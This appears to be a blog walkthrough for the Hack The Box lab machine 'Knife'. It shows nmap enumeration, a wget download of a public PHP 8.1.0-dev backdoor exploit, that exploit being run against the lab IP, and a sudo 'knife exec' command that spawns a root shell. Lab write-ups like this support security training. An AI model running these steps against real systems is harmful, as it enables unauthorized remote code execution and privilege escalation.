Pawning Knife from HTB in less than 20 minutes

knife from HTB

Set up your VPN & let’s dive in ;)

Now let’s run a quick nmap scan for the target machine.

I prefer to run 2 different scans simultaneoulsy which are:

nmap -sC -sV -T4 -p- <IP>

nmap -vv -script vuln -p- <IP>

I won’t go deep to explian but the first command performs the enumeration i.e. tells what services are running on target and which ports are active, while the second one goes to scan for the exploitable vulnerabilities from CVV’s , famous or old exploits like MS17–010 {Eternal Blue}, etc..

So after running these commands i got two outputs which are:

and from second command we have:

Now as nmap outputs clearly we have a webpage at front publicly available, so let’s go to that page, after loading it we don’t get much useful info for us but we get the technologies on which it works and also their version information, for this you can either access it through web browser plugin of wappalyzer (recommended) or through inspect element in browser.

As we find the php version to be 8.1.0-dev.

Now the most important question is How to approach the target when there is practically no source for getting in physically ?

Fortunately we have an exploit script that will bring the shell to us through netcat by exploiting this version of php.

Now we download that script through this link

If you are working in the kali or on any linux then run this command to downlaod it and name it as exploit.py or whatever you may like!!

wget https://packetstormsecurity.com/files/download/162749/php_8.1.0-dev.py.txt -O exploit.py

Now we deploy this exploit on target to get the shell by this command.

python3 exploit.py -u http://10.10.10.242/ -c “id”

I have used “id” along with -c as this was the requirement as a paramter for the exploit and for more details you may run help to see in detail.

We will get the shell something like:

Now we search through the folders available to look for users flag. (It is easy believe me ).

Now what lies is Privilege Escalation

we have two methods to do

1st method is to escalate privileges through Source file which are written in ruby. So either we write and exploit by this or just pass some commands to exploit (Like a hacker XD)

So the other method is escalating privileges through these steps:

sudo -l

sudo /usr/bin/knife exec --exec "exec '/bin/sh -i'"

Now hop from folders to folders and get the root flag.

Don’t forget to give a clap and follow for more easy-pizzy walkthroughs. Thanks for reading ❤